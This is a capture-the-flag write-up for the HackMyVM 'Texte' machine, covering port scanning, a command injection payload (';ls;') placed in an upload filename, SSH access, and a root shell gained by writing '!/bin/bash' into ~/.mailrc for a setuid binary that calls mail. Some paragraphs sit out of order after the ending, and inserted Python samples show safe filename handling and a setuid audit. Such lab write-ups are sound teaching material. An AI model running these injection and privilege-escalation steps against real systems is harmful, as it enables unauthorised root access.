
Texte Write-Up

Last updated 7 months ago

Introduction

In this write-up, I will guide you through the steps I took to complete the HackMyVM - Texte CTF challenge. The objective is to gain root access to the target machine by exploiting the vulnerabilities we identify along the way. Check out the video here (update this).

TL;DR

Reconnaissance

Network/Port Scanning (Nmap)

Command:

nmap -sV -sC -vv -oA texte 172.16.100.32

Explanation:

  • nmap: Network and port scanner used to discover which services are running.

  • -sV: Perform version detection of the discovered services.

  • -sC: Run the default NSE scripts.

  • -oA: Write the output in all formats using the base filename "texte".

  • 172.16.100.32: IP address of the Texte VM on my network.

Output:

# Nmap 7.95 scan initiated Mon Oct 21 00:09:29 2024 as: nmap -sC -sV -vv -oA texte -p- 172.16.100.32
Nmap scan report for texte.home.com (172.16.100.32)
Host is up, received syn-ack (0.010s latency).
Scanned at 2024-10-21 00:09:33 PDT for 11s
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
|   3072 40:eb:35:37:99:c2:91:25:38:2d:70:33:e2:7d:9a:c1 (RSA)
|   256 35:a0:dc:63:24:db:23:b8:85:c1:4d:95:e8:bb:8f:ca (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBF2VaLgWiBuzT3HbXfJP92ViyqgH1dcSjCpQVlauKGvjRuuJYFHYJb2mD2vNfVAy4uwN3freAMK7c/LXrZaHtT4=
|   256 4c:cb:02:1c:ae:b8:08:1a:5e:4a:a9:29:d1:13:e2:39 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIILXu+XQCkTLzBxMZRAdD3Xfp3NxmURWyqWzh610oP9z
80/tcp open  http    syn-ack nginx 1.18.0
| http-methods:
|_  Supported Methods: GET HEAD
|_http-title: TexteBoard
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Oct 21 00:09:44 2024 -- 1 IP address (1 host up) scanned in 15.11 seconds

Findings:

We see a web server on port 80 and an SSH server on port 22. The SSH server will presumably give us a proper shell once we find a user's password or private key.

Let's check out the web server and, in the background, run gobuster to brute-force web directories.

Directory Brute-forcing (Gobuster)

While we brute force the directory of the website, we can check out the website on a browser.

gobuster dir -u http://172.16.100.32 -w /SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x html,php,txt | tee -a texte.gobuster

Note: I have set up an alias to run gobuster inside a Docker container.

Alias:

alias gobuster='docker run -it --rm --name gobuster -v /home/ayush/Tools/SecLists/:/SecLists ghcr.io/oj/gobuster'

Explanation:

  • dir: Mode of operation indicating directory/file enumeration.

  • -u http://172.16.100.32: Base URL of the target web server to scan.

  • -w /SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt: Path of word list to use.

  • -x html,php,txt: File extension(s) to search for.

Output:

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.16.100.32
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,php,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 476]
/upload.php           (Status: 200) [Size: 27]
Progress: 882236 / 882240 (100.00%)
===============================================================
Finished
===============================================================

Findings:

We find only two pages (index.html and upload.php) and no hidden directories.

So let's check out the web page and its functionality.

Visiting Web Page (Port 80)

We see a basic web page with a file upload function. After some experimentation, we find that it only accepts image formats such as .jpg and .png.

After uploading an image, the page displays it as shown:

So, I started by trying to upload a PHP reverse shell under different file extensions, but that did not work. The request only accepted image data, so I tried to inject PHP into an image.

Exploitation

Command Injection Vulnerability

So, I sent the following request:

and as you can see on line number 18, the filename is the payload:

;ls;

Below is the response I got for the above request:

which shows that there is another file hosted on the web server which we can access.

After visiting the following URL:

172.16.100.32/uiydasuiydasuicyxzuicyxziuctxzidsauidascxzAAA.txttxttxt

a file is downloaded with the following contents:
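The bug behind the `;ls;` filename is a handler that hands the client-supplied name to a shell unquoted. As an added illustration (not code from the challenge's upload.php, which we never see), the Python below contrasts that pattern with an allowlist plus argv-based version that a name such as `;ls;` or `../x.png` cannot hijack; the upload directory and the `file` command are assumptions.

```python
import re
import shlex
from pathlib import Path
from typing import List

# Assumed upload directory for this demonstration (not the VM's real path).
UPLOAD_DIR = Path("uploads")
# Allowlist: letters, digits, '_' or '-', then exactly one image extension.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.(?:png|jpe?g|gif)", re.IGNORECASE)


def vulnerable_command(filename: str) -> str:
    """Command string a naive upload handler would hand to /bin/sh.
    The name is interpolated unquoted, so ';ls;' makes the shell run
    'file uploads/' and then 'ls' as two separate commands."""
    return f"file {UPLOAD_DIR}/{filename}"


def safe_filename(filename: str) -> str:
    """Return filename if it passes the allowlist, otherwise raise ValueError.
    Path(...).name != filename catches any directory component ('../x.png')."""
    if Path(filename).name != filename or not SAFE_NAME.fullmatch(filename):
        raise ValueError(f"rejected filename: {filename!r}")
    return filename


def is_accepted(filename: str) -> bool:
    """True when safe_filename() would accept the name."""
    try:
        safe_filename(filename)
        return True
    except ValueError:
        return False


def safe_argv(filename: str) -> List[str]:
    """argv for subprocess.run(argv, shell=False): no shell parses the name,
    so metacharacters can never turn into separate commands."""
    return ["file", str(UPLOAD_DIR / safe_filename(filename))]


def quoted_command(filename: str) -> str:
    """Defence in depth when a shell string is unavoidable: shlex.quote()
    makes the whole path one single-quoted word, so ';' stays literal."""
    return f"file {shlex.quote(str(UPLOAD_DIR / filename))}"
```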

User (kamila) Access

We can try using these credentials for the SSH server we found earlier. And on doing so, we see that the credentials work and we have shell access for the user kamila.

Read the user.txt file to get the flag:

cat user.txt

Privilege Escalation

On running the first privilege escalation command:

sudo -l

we see that the machine does not have a sudo binary.

Next, we look for binaries with a set-id bit using the command below. Note that -perm -g=s matches the setgid bit; the setuid bit is matched by -perm -u=s (or -perm -4000), so if you are after SETUID binaries specifically, use that form.

find / -perm -g=s -type f 2>/dev/null

Output:

We see there is a /opt/texte binary which we can run as the root user because of the SETUID capability.

On checking the strings in the binary we see that it is invoking the following command:

/usr/bin/mail -s 'Remember,dont upload PHP files.' kamila@localhost

After some help from ChatGPT, I realised that mail reads the ~/.mailrc file at startup, and that any line beginning with a ! is executed as a shell command.

So, I created the ~/.mailrc file using the following command:

echo '!/bin/bash' > /home/kamila/.mailrc

After this, execute the /opt/texte binary to get the root shell as follows:

And finally, we can read the root flag:

cat /root/root.txt
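The two enumeration steps above, the set-id search and the strings check for a mail invocation, combined into one audit script. This is an added example, not a tool from the write-up; it checks the setuid and setgid bits separately (which the find command's -g=s does not) and builds its own constructed sample tree so it can be run offline.

```python
import os
import stat
import tempfile
from typing import Dict, List

# Marker the write-up found with strings(1) inside /opt/texte.
MAIL_MARKER = b"/usr/bin/mail"


def references_mail(path: str) -> bool:
    """Stand-in for `strings binary | grep mail`: is the marker in the file?"""
    with open(path, "rb") as fh:
        return MAIL_MARKER in fh.read()


def find_setuid_binaries(root: str) -> List[Dict[str, object]]:
    """Walk root; return every regular file with the setuid or setgid bit,
    flagging those that embed a mail invocation. lstat() avoids following
    symlinks; unreadable entries are skipped instead of aborting the scan."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
                suid = bool(st.st_mode & stat.S_ISUID)
                sgid = bool(st.st_mode & stat.S_ISGID)
                if not stat.S_ISREG(st.st_mode) or not (suid or sgid):
                    continue
                hits.append({"path": path, "suid": suid, "sgid": sgid,
                             "mail": references_mail(path)})
            except OSError:
                continue
    return sorted(hits, key=lambda h: h["path"])


def make_demo_tree() -> str:
    """Constructed sample tree (not the VM's filesystem): a setuid file that
    embeds the mail command, a setgid-only file, and an ordinary script."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    samples = {
        "opt/texte": (b"\x7fELF...elided..." + MAIL_MARKER, 0o4755),
        "usr/bin/sgid_tool": (b"\x7fELF...elided...", 0o2755),
        "bin/plain.sh": (b"#!/bin/sh\necho hi\n", 0o755),
    }
    for rel, (content, mode) in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(content)
        os.chmod(path, mode)
    return root
```

Run find_setuid_binaries("/") as an unprivileged user to reproduce the write-up's enumeration; the constructed tree from make_demo_tree() only exists to show the output shape.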

I followed this amazingly well written and informational blog to inject some PHP into the image, but again to no avail.

So, after reading up more and reaching this part in the HackTricks page, I decided to try command injection in the filename.

Note: I refer to this GitHub page for privilege escalation methods.

So, since it is invoking the mail binary, we need to somehow use that to elevate our privileges. I checked the man page for mail, which mentions that commands can be added to the ~/.mailrc file and are executed whenever the mail program runs.